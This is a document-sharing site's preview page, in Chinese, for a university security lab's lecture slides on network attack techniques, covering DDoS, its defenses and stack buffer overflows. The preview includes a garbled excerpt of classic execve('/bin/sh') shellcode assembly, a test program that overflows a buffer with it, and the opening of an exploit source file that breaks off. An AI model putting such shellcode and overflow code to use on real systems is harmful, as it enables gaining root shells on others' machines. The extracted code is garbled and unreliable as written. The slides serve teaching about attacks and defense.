网站大量收购独家精品文档,联系QQ:2885784924

网络攻击技术报告-北京大学计算机系信息安全研究室.pptVIP

网络攻击技术报告-北京大学计算机系信息安全研究室.ppt

  1. 1、本文档共101页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  5. 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  6. 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  7. 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  8. 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
网络攻击技术报告-北京大学计算机系信息安全研究室

网络攻击技术; 目录 ;网络攻击技术简介;攻击分类;攻击步骤与方法 ;入侵攻击;欺骗攻击;会话劫持攻击;缓冲区溢出攻击 ;保留访问权限;保留访问权限(续);隐藏踪迹;隐藏踪迹(续) ; 目录 ;分布式拒绝服务攻击的实施及预防措施;DDoS的诞生;拒绝服务攻击;分布式拒绝服务攻击 ;分布式拒绝服务攻击特点;DDoS攻击过程;DDoS攻击的网络结构 ;DDoS所利用的协议漏洞;DDoS所利用的协议漏洞(续).;DDoS攻击的五种常用方式;DDoS攻击的五种常用方式;DDoS攻击的五种常用方式;DDoS攻击的五种常用方式;DDoS攻击新技术——反弹技术;反弹技术原理;反弹技术实现DDoS攻击与传统DDoS攻击的区别:;DDoS攻击下的防御;DDoS攻击下的防御;网络流量的几种异常模式;网络流量的几种异常模式;网络监测工具的使用;拒绝服务监控系统的设计 ;拒绝服务监控系统的设计;拒绝服务监控系统的设计; 目录 ;缓冲区溢出攻击与防御;概念;原因;后果;缓冲区溢出攻击与防御;回顾C语言;一:指针型攻击方法;取得成功必须具备下列条件;攻击实施过程;二:数组型攻击方法;必须满足的条件;实施过程一;实施过程二;堆栈结构;看一段小程序;运行时的堆栈分配 ?;执行完gets(name)之后 ?;堆栈溢出 ?;如何书写一个shell code;加入系统调用exit;代码设计思路;jmp ???call的偏移地址 ??????????# 2 bytes ? popl ??esi ????????????????????# 1 byte ?????? ?//popl出来的是string的地址。 ? movl ?esi,array-offset(esi) ? #3bytes ?? ????//在string+8处构造 name数组, ? //name[0]放 string的地址 ? movb $0x0,nullbyteoffset(esi)# 4bytes //string+7处放0作为string的结尾。 ? movl ??$0x0,null-offset(esi) ??#7bytes ?????//name[1]放0。 ? movl ??$0xb,eax ???????????# 5bytes //eax=0xb是execve的syscall代码 ? movl ??esi,ebx ???????????????#2bytes ??? ???//ebx=string的地址 ? ;leal ??array-offset,(esi),ecx # 3bytes //ecx=name数组的开始地址 leal ??null-offset(esi),edx ??#3bytes //edx=name[1]的地址 ? int ???$0x80 ???????????????????# 2 bytes ???? ??//int 0x80是sys call ? movl ??$0x1, eax ??????????????# 5bytes //eax=0x1是exit的syscall代码 ? movl ??$0x0, ebx ??????????????# 5bytes //ebx=0是exit的返回值 ? int ???$0x80 ???????????????????# 2 bytes ???? ??//int 0x80是sys call ? call ??popl 的偏移地址 ?????????# 5 bytes ?? ???//这里放call,string的地址就会作为/bin/sh 字符串返回地址压栈 ? ;测试程序;char large_string[128]; ? ? void main() { ? ?char buffer[96]; ? ?int i; ? ?long *long_ptr = (long *)large_string; for (i = 0; i 32; i++) ? ???*(long_ptr + i) = (int) buffer; ? ? ?for (i = 0; i strlen(shellcode); i++) ? ???large_string[i] = shellcode[i]; ? ? ?strcpy(buffer,large_string); ? } ? ;在执行完strcpy后,堆栈内容如下所示: ?;利用别人的程序的堆栈溢出获得rootshell ;意味着…;但是;获得堆栈开始地址;开始猜;exploit1.c ? #includestdio.h ? #includestdlib.h ? #define OFFSET ???????????

文档评论(0)

wuyoujun92 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档